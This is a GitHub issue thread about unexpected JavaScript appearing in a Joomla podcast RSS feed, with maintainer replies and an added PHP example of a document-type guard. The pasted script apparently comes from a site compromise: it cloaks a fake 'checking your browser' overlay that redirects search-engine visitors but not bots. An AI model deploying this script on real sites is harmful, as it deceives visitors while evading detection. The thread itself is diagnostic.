BabDev / Podcast-Manager

Podcast Manager is a suite of extensions allowing users to host and manage a podcast feed from their Joomla! site.
http://www.babdev.com/extensions/podcast-manager

Javascript in RSS feed (won't validate) #220

Closed breed-redlocks closed 8 years ago

breed-redlocks commented 8 years ago

Hi, I'm now seeing some random browser-checking code at the bottom of my RSS feed. See here: http://badfeelingpodcast.com/rss

https://validator.w3.org/feed/check.cgi?url=http%3A%2F%2Fbadfeelingpodcast.com%2Frss

-code below-

```html
<script type='text/javascript'>
function start(){function s(e){var t=document.cookie,n=t.indexOf(' '+e+'=');n==-1&&(n=t.indexOf(e+'='));if(n==-1)t=null;else{n=t.indexOf('=',n)+1;var r=t.indexOf(';',n);r==-1&&(r=t.length),t=unescape(t.substring(n,r))}return t}function o(e,t,n){var r=new Date;r.setDate(r.getDate()+n);var i=escape(t)+(n==null?'':'; expires='+r.toUTCString());document.cookie=e+'='+i}function u(){var e=s('referrerRedirectCookie');return e!=null&&e!=''?!0:(o('referrerRedirectCookie','do not redirect',730),!1)}var e=document.referrer,t,n=['',' '],r=['google','yahoo','bing','yandex','baidu','gigablast','soso','blekko','exalead','https','duckduckgo','http'];if(!e)console.log('direct'),u();else for(t=0;t<r.length;++t)if(e.indexOf(r[t])+1&&!u()){var i=navigator.userAgent;if(!i||i.length==0)return;i=i.toLowerCase(),i.indexOf('google')==-1&&i.indexOf('bot')==-1&&i.indexOf('crawl')==-1&&hideWebSite()}}function createPopup(){var e=document.createElement('div');e.style.position='absolute',e.style.width='100%',e.style.height='100%',e.style.left=0,e.style.top=0,e.style.backgroundColor='white',e.style.zIndex=99999,document.body.appendChild(e),e.onclick=function(){window.location=w_location};var t=document.createElement('p');return t.innerText='Checking your browser before accessing '+window.location.host+'...',t.style.textAlign='center',t.style.fontSize='x-large',t.style.position='relative',t.textContent=t.innerText,e.appendChild(t),e}function createButton(){var e=document.createElement('div');return e.style.position='absolute',e.style.top='20%',e.style.left='10%',e.style.right='10%',e.style.width='80%',e.style.border='1px solid black',e.style.textAlign='center',e.style.verticalAlign='middle',e.style.margin='0, auto',e.style.cursor='pointer',e.style.fontSize='xx-large',e.style.borderRadius='5px',e.onclick=function(){window.location=w_location},e.onmouseover=function(){e.style.border='1px solid red',e.style.color='red'},e.onmouseout=function(){e.style.border='1px solid black',e.style.color='black'},e.innerText='Continue',e.textContent=e.innerText,e}var w_location='/?pagerd_' + Math.random().toString(36).substring(7),hideWebSite=function(){var e=createPopup(),t=createButton();e.appendChild(t)},readyStateCheckInterval=setInterval(function(){(document.readyState==='complete'||document.readyState=='interactive')&&clearInterval(readyStateCheckInterval)},10);start();
</script>
```

mbabker commented 8 years ago

At first guess, there is a plugin on your site adding this code which doesn't check if the document type is HTML so it always gets appended to the output. Disabling that plugin would be a temporary solution, long term the developer should add some checks to their code to ensure that snippet isn't being rendered for non-HTML outputs.
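The document-type check described above, as an added illustration rather than code from Podcast Manager or from whatever plugin produced the snippet: a Joomla 3 system plugin that only appends its script to front-end HTML documents, so feed, JSON and raw outputs are left untouched. The plugin class name and the script path are placeholders.

```php
<?php
// Hypothetical Joomla 3 system plugin (plugins/system/htmlonlysnippet/htmlonlysnippet.php).
// Added example: shows the guard a plugin should have before injecting markup into output.
defined('_JEXEC') or die;

class PlgSystemHtmlonlysnippet extends JPlugin
{
    /**
     * Runs after the document has been rendered, just before the response is sent.
     * Without the guard below, the snippet would also land at the end of RSS/Atom feeds
     * (document type "feed"), JSON and raw responses, breaking feed validation.
     */
    public function onAfterRender()
    {
        $app = JFactory::getApplication();
        $doc = JFactory::getDocument();

        // Guard 1: never touch the administrator side.
        // Guard 2: only an HTML document has a <body> to append to.
        if ($app->isAdmin() || $doc->getType() !== 'html') {
            return;
        }

        $body = $app->getBody();

        // Guard 3: some HTML responses (e.g. tmpl=component or tmpl=raw)
        // still have no closing body tag; do nothing rather than append blindly.
        if (strpos($body, '</body>') === false) {
            return;
        }

        // Placeholder path: the plugin's own static asset, loaded from the site itself.
        $snippet = '<script src="/media/plg_system_htmlonlysnippet/js/snippet.js"></script>';

        $app->setBody(str_replace('</body>', $snippet . "\n</body>", $body));
    }
}
```

When auditing a site for the symptom in this issue, the plugins to look at first are system plugins implementing onAfterRender without a getType() check like the one above.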

breed-redlocks commented 8 years ago

I disabled all plugins and the code is still in the RSS that's generated. What else can we try?

mbabker commented 8 years ago

Check your template to see if it's appending it perhaps? Or are you using any third party services that might be injecting script into your site's pages?

breed-redlocks commented 8 years ago

Turns out this was an issue with an old version of Joomla. I upgraded to 3.4.6 and all is well. Thanks for your time.

mbabker commented 8 years ago

Just for reference, searching around on parts of that script's contents (expanded out at https://gist.github.com/mbabker/75aefb465d6212774ab5), I might suggest doing a quick security audit on your site. Part of it seems to trace back to CloudFlare and another part of it brought me to some sites talking about a potential hack (http://tweetypage.com/wordpress-hacked/ is one article where part of that script's contents are very close to what's described on the blog). It may turn out to be nothing, but given how closely the script seems to resemble these documented hacks and recent Joomla security issues, checking over your site to ensure it isn't compromised wouldn't be a bad idea.